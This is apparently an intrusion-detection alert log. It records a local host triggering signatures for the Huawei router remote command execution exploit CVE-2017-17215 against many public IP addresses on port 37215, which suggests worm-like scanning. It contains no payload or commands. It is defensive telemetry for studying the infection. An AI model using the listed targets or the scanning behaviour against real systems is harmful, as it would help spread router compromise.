                                                    07/10/24-08:26:25.502478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3910037215192.168.2.14150.13.84.184
                                                    07/10/24-08:26:47.909611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4700837215192.168.2.14217.57.178.206
                                                    07/10/24-08:27:27.081335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5932237215192.168.2.144.171.148.185
                                                    07/10/24-08:26:13.833831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964437215192.168.2.1488.223.157.166
                                                    07/10/24-08:26:34.209282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974837215192.168.2.14197.12.183.59
                                                    07/10/24-08:26:23.300149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200637215192.168.2.1441.189.163.137
                                                    07/10/24-08:26:53.161578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4667837215192.168.2.14157.31.234.13
                                                    07/10/24-08:26:57.566526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316637215192.168.2.14157.32.176.173
                                                    07/10/24-08:27:22.872041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947637215192.168.2.14157.225.64.149
                                                    07/10/24-08:27:23.912574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672037215192.168.2.14157.16.169.183
                                                    07/10/24-08:27:10.629470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892037215192.168.2.14157.234.50.28
                                                    07/10/24-08:26:41.418046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738037215192.168.2.14157.106.78.71
                                                    07/10/24-08:26:31.090625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676437215192.168.2.1441.51.239.210
                                                    07/10/24-08:26:43.696289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238037215192.168.2.14197.121.213.172
                                                    07/10/24-08:27:30.460852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825837215192.168.2.14191.126.46.112
                                                    07/10/24-08:26:15.868019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786837215192.168.2.14157.226.66.176
                                                    07/10/24-08:26:43.798286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3368637215192.168.2.14157.181.227.139
                                                    07/10/24-08:26:11.567410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457237215192.168.2.1441.89.167.115
                                                    07/10/24-08:26:59.766044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437037215192.168.2.14157.45.216.115
                                                    07/10/24-08:26:55.295464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3624437215192.168.2.1441.243.13.148
                                                    07/10/24-08:26:25.446439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5417637215192.168.2.14197.47.216.112
                                                    07/10/24-08:26:26.619862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5731637215192.168.2.1441.239.103.250
                                                    07/10/24-08:26:22.281423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889437215192.168.2.144.245.209.31
                                                    07/10/24-08:26:33.171488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493637215192.168.2.14197.224.132.60
                                                    07/10/24-08:26:26.435270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037037215192.168.2.14197.153.191.254
                                                    07/10/24-08:26:38.527687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827637215192.168.2.1441.184.189.207
                                                    07/10/24-08:27:05.210866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476237215192.168.2.14157.40.132.62
                                                    07/10/24-08:26:33.252129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585037215192.168.2.14157.81.56.200
                                                    07/10/24-08:27:28.156684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806237215192.168.2.1441.52.202.70
                                                    07/10/24-08:26:42.432060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233637215192.168.2.14157.20.140.64
                                                    07/10/24-08:27:02.852846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4521037215192.168.2.14157.200.234.3
                                                    07/10/24-08:26:38.543702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536037215192.168.2.14197.231.222.161
                                                    07/10/24-08:26:25.520739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208437215192.168.2.1441.121.218.218
                                                    07/10/24-08:27:02.733003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843237215192.168.2.14157.255.115.124
                                                    07/10/24-08:27:30.534474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086037215192.168.2.1441.4.34.24
                                                    07/10/24-08:26:43.776832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913837215192.168.2.14157.104.75.212
                                                    07/10/24-08:27:02.939929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358837215192.168.2.14157.117.238.15
                                                    07/10/24-08:27:24.954167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760037215192.168.2.1437.214.248.146
                                                    07/10/24-08:27:19.271006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044037215192.168.2.1441.131.220.189
                                                    07/10/24-08:26:55.283062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457037215192.168.2.14197.95.206.203
                                                    07/10/24-08:27:14.847591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749037215192.168.2.14157.178.199.196
                                                    07/10/24-08:26:11.493465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488037215192.168.2.1437.145.73.193
                                                    07/10/24-08:27:30.477635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092637215192.168.2.14197.221.164.224
                                                    07/10/24-08:27:07.268531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316437215192.168.2.1441.195.86.72
                                                    07/10/24-08:27:27.051851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792237215192.168.2.14197.77.169.110
                                                    07/10/24-08:26:43.849497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619037215192.168.2.14197.63.176.30
                                                    07/10/24-08:27:13.850530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5798237215192.168.2.1441.163.208.102
                                                    07/10/24-08:27:24.871233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963637215192.168.2.1481.181.238.227
                                                    07/10/24-08:27:05.200422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836437215192.168.2.1441.244.24.12
                                                    07/10/24-08:27:24.948022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351237215192.168.2.14197.254.114.88
                                                    07/10/24-08:27:33.823408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285037215192.168.2.14157.172.165.254
                                                    07/10/24-08:26:57.658066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822837215192.168.2.14124.58.172.167
                                                    07/10/24-08:26:11.533087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377437215192.168.2.1432.36.66.249
                                                    07/10/24-08:26:57.505906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735837215192.168.2.14197.106.212.56
                                                    07/10/24-08:27:11.612817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814637215192.168.2.1441.103.197.20
                                                    07/10/24-08:26:41.558388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5616437215192.168.2.14197.212.163.131
                                                    07/10/24-08:27:08.383714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707637215192.168.2.14197.189.111.174
                                                    07/10/24-08:27:22.903995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3488237215192.168.2.14157.71.89.80
                                                    07/10/24-08:26:26.592095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5949637215192.168.2.1441.245.119.238
                                                    07/10/24-08:26:31.102239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919637215192.168.2.14157.13.37.69
                                                    07/10/24-08:26:17.927872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746837215192.168.2.14185.74.123.112
                                                    07/10/24-08:27:11.523000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800237215192.168.2.14197.225.60.225
                                                    07/10/24-08:26:23.294371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6024237215192.168.2.1418.0.145.160
                                                    07/10/24-08:26:31.110610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068637215192.168.2.14157.103.134.156
                                                    07/10/24-08:26:20.182114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590237215192.168.2.14136.164.156.252
                                                    07/10/24-08:26:33.217883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779037215192.168.2.148.194.50.232
                                                    07/10/24-08:27:05.219049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296037215192.168.2.14197.202.19.128
                                                    07/10/24-08:26:13.822021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875637215192.168.2.1441.31.100.2
                                                    07/10/24-08:26:43.657451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493437215192.168.2.14197.42.37.119
                                                    07/10/24-08:27:11.491951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441037215192.168.2.1473.186.27.156
                                                    07/10/24-08:26:59.580181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468837215192.168.2.14177.249.157.0
                                                    07/10/24-08:26:29.851044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909437215192.168.2.14197.192.27.206
                                                    07/10/24-08:26:55.349014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5949237215192.168.2.14197.56.158.26
                                                    07/10/24-08:26:51.964382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911237215192.168.2.14197.62.8.84
                                                    07/10/24-08:27:19.253799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951437215192.168.2.14197.129.4.196
                                                    07/10/24-08:26:14.622607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4657037215192.168.2.14197.242.193.248
                                                    07/10/24-08:26:59.828801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472037215192.168.2.14157.123.99.64
                                                    07/10/24-08:27:07.361334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597637215192.168.2.14157.218.171.95
                                                    07/10/24-08:27:22.913533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3872637215192.168.2.14114.82.7.93
                                                    07/10/24-08:27:33.743340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733837215192.168.2.14202.99.56.91
                                                    07/10/24-08:27:05.115826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3373437215192.168.2.1441.68.195.103
                                                    07/10/24-08:27:24.867302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880837215192.168.2.1441.33.165.234
                                                    07/10/24-08:26:33.231891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3387237215192.168.2.1441.251.134.14
                                                    07/10/24-08:26:43.613127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860237215192.168.2.14157.136.23.9
                                                    07/10/24-08:26:57.586021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839437215192.168.2.14197.196.49.193
                                                    07/10/24-08:26:38.585577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5226037215192.168.2.14197.131.210.44
                                                    07/10/24-08:26:17.976557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6005837215192.168.2.14197.92.53.137
                                                    07/10/24-08:26:59.879112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4522037215192.168.2.1441.164.110.225
                                                    07/10/24-08:27:31.565038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964237215192.168.2.1441.253.19.73
                                                    07/10/24-08:26:14.809992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257837215192.168.2.14200.85.31.170
                                                    07/10/24-08:27:20.501426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788637215192.168.2.14116.23.83.60
                                                    07/10/24-08:26:14.814365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574437215192.168.2.14157.82.248.62
                                                    07/10/24-08:27:30.558808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941037215192.168.2.14107.204.218.163
                                                    07/10/24-08:26:15.862612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899637215192.168.2.1452.214.121.84
                                                    07/10/24-08:26:49.789175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277037215192.168.2.14157.139.235.151
                                                    07/10/24-08:26:36.373658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232437215192.168.2.14197.83.92.66
                                                    07/10/24-08:26:53.202392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205837215192.168.2.1441.48.40.139
                                                    07/10/24-08:26:29.861984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3350037215192.168.2.14156.254.174.72
                                                    07/10/24-08:27:22.527707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956837215192.168.2.14197.249.51.112
                                                    07/10/24-08:27:05.127145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4421237215192.168.2.14118.78.74.228
                                                    07/10/24-08:26:26.564107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044237215192.168.2.14197.125.223.14
                                                    07/10/24-08:26:42.410235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518837215192.168.2.14197.22.17.94
                                                    07/10/24-08:27:14.885642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471637215192.168.2.14197.231.2.1
                                                    07/10/24-08:27:32.490587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4261837215192.168.2.14157.250.216.3
                                                    07/10/24-08:27:03.025097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421037215192.168.2.14197.255.96.26
                                                    07/10/24-08:27:17.083690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292437215192.168.2.14115.92.106.18
                                                    07/10/24-08:27:24.944052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5466237215192.168.2.14157.134.77.136
                                                    07/10/24-08:27:14.667183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993637215192.168.2.14197.76.74.25
                                                    07/10/24-08:27:10.751291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315237215192.168.2.14157.193.190.173
                                                    07/10/24-08:27:28.087118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4634037215192.168.2.14216.41.203.119
                                                    07/10/24-08:27:11.557326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4587037215192.168.2.14197.11.16.179
                                                    07/10/24-08:27:27.174460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631037215192.168.2.14197.150.57.49
                                                    07/10/24-08:27:22.564471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697237215192.168.2.1476.233.37.203
                                                    07/10/24-08:26:14.825440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3519037215192.168.2.14197.43.10.29
                                                    07/10/24-08:27:07.315089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3431637215192.168.2.14197.212.183.57
                                                    07/10/24-08:27:23.847677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934037215192.168.2.14197.125.7.16
                                                    07/10/24-08:27:10.662603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593837215192.168.2.14168.91.213.216
                                                    07/10/24-08:27:34.122449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542237215192.168.2.14157.17.145.18
                                                    07/10/24-08:27:32.608891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619437215192.168.2.14165.226.214.104
                                                    07/10/24-08:26:28.736884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732237215192.168.2.14157.90.73.9
                                                    07/10/24-08:27:07.386314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5254437215192.168.2.14157.60.207.198
                                                    07/10/24-08:26:34.187121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556237215192.168.2.14157.155.64.234
                                                    07/10/24-08:26:22.296944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990637215192.168.2.14157.93.89.228
                                                    07/10/24-08:26:59.683297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516637215192.168.2.1441.56.10.88
                                                    07/10/24-08:27:05.228923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4069437215192.168.2.14197.75.102.201
                                                    07/10/24-08:27:22.930500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469837215192.168.2.14150.235.144.231
                                                    07/10/24-08:26:41.431055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544437215192.168.2.14157.171.63.198
                                                    07/10/24-08:27:19.191147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992237215192.168.2.14157.120.181.151
                                                    07/10/24-08:27:33.907934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722637215192.168.2.14197.77.170.174
                                                    07/10/24-08:26:28.924774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940637215192.168.2.14157.5.252.130
                                                    07/10/24-08:26:57.536379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709837215192.168.2.1444.21.131.81
                                                    07/10/24-08:26:14.784198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5007037215192.168.2.14115.158.253.187
                                                    07/10/24-08:26:25.523896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315237215192.168.2.14157.127.210.225
                                                    07/10/24-08:26:14.819309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4263837215192.168.2.14197.182.123.43
                                                    07/10/24-08:26:57.633994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738037215192.168.2.14197.104.183.188
                                                    07/10/24-08:26:43.549542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652437215192.168.2.14197.229.7.112
                                                    07/10/24-08:26:22.285736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442037215192.168.2.14197.183.183.189
                                                    07/10/24-08:26:43.634371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4456437215192.168.2.1427.69.52.253
                                                    07/10/24-08:27:05.138927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628237215192.168.2.1441.166.169.157
                                                    07/10/24-08:27:31.473922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296437215192.168.2.1454.105.151.126
                                                    07/10/24-08:27:10.605633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566837215192.168.2.14157.128.146.158
                                                    07/10/24-08:27:20.475094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993037215192.168.2.1441.8.183.126
                                                    07/10/24-08:27:24.963171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960637215192.168.2.1471.233.185.114
                                                    07/10/24-08:27:27.092607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5353637215192.168.2.1441.205.89.161
                                                    07/10/24-08:26:18.003273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079437215192.168.2.14197.38.81.95
                                                    07/10/24-08:27:19.151006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356037215192.168.2.1469.185.48.244
                                                    07/10/24-08:26:17.985178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6068837215192.168.2.14157.198.227.135
                                                    07/10/24-08:26:15.861470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676637215192.168.2.14209.93.144.34
                                                    07/10/24-08:26:28.630891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951037215192.168.2.14197.112.0.197
                                                    07/10/24-08:26:26.432231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5375837215192.168.2.14157.19.54.119
                                                    07/10/24-08:26:53.198978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754037215192.168.2.14197.84.250.61
                                                    07/10/24-08:27:10.663912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103837215192.168.2.14197.118.228.151
                                                    07/10/24-08:26:49.809018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733837215192.168.2.14157.214.99.223
                                                    07/10/24-08:27:24.981479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4594037215192.168.2.1441.251.249.205
                                                    07/10/24-08:26:45.652224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316437215192.168.2.1441.47.165.41
                                                    07/10/24-08:27:14.860796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011637215192.168.2.14157.232.230.137
                                                    07/10/24-08:27:08.389213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613237215192.168.2.1441.19.88.114
                                                    07/10/24-08:26:42.370948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164037215192.168.2.14157.124.61.206
                                                    07/10/24-08:27:28.151143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501837215192.168.2.14197.80.119.218
                                                    07/10/24-08:26:59.853366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121837215192.168.2.1441.42.11.101
                                                    07/10/24-08:26:59.646424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3846237215192.168.2.14197.239.221.233
                                                    07/10/24-08:26:25.519019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3418037215192.168.2.14197.86.150.160
                                                    07/10/24-08:27:03.019340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571837215192.168.2.14202.251.232.34
                                                    07/10/24-08:27:32.583920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5971437215192.168.2.1441.99.213.124
                                                    07/10/24-08:26:41.560670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927037215192.168.2.1441.220.40.73
                                                    07/10/24-08:26:48.006424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4186437215192.168.2.14135.115.199.31
                                                    07/10/24-08:26:42.367080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5587837215192.168.2.14157.60.146.108
                                                    07/10/24-08:27:14.807455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660037215192.168.2.14197.210.85.231
                                                    07/10/24-08:26:57.668883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772237215192.168.2.14157.94.7.80
                                                    07/10/24-08:26:42.387437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3357437215192.168.2.14114.101.230.200
                                                    07/10/24-08:27:24.964611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967437215192.168.2.14157.86.94.103
                                                    07/10/24-08:26:20.164918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3421237215192.168.2.14157.71.124.5
                                                    07/10/24-08:27:22.831755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861437215192.168.2.14125.104.126.171
                                                    07/10/24-08:26:31.056369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5000837215192.168.2.14157.21.228.253
                                                    07/10/24-08:27:33.976933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370237215192.168.2.1441.33.119.37
                                                    07/10/24-08:26:33.196369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719637215192.168.2.14157.137.21.248
                                                    07/10/24-08:27:30.527827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3703637215192.168.2.14160.165.103.66
                                                    07/10/24-08:26:28.787394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735637215192.168.2.14197.158.225.154
                                                    07/10/24-08:26:11.551318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659237215192.168.2.14157.16.97.14
                                                    07/10/24-08:26:14.808905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671237215192.168.2.14197.51.219.208
                                                    07/10/24-08:26:29.773841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706037215192.168.2.1441.232.119.222
                                                    07/10/24-08:27:08.451424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291237215192.168.2.14197.24.20.194
                                                    07/10/24-08:26:55.460138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097037215192.168.2.14163.66.244.106
                                                    07/10/24-08:26:11.116791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067037215192.168.2.14197.190.231.229
                                                    07/10/24-08:27:30.510800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677237215192.168.2.14197.14.60.228
                                                    07/10/24-08:26:17.958835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240637215192.168.2.1441.230.44.221
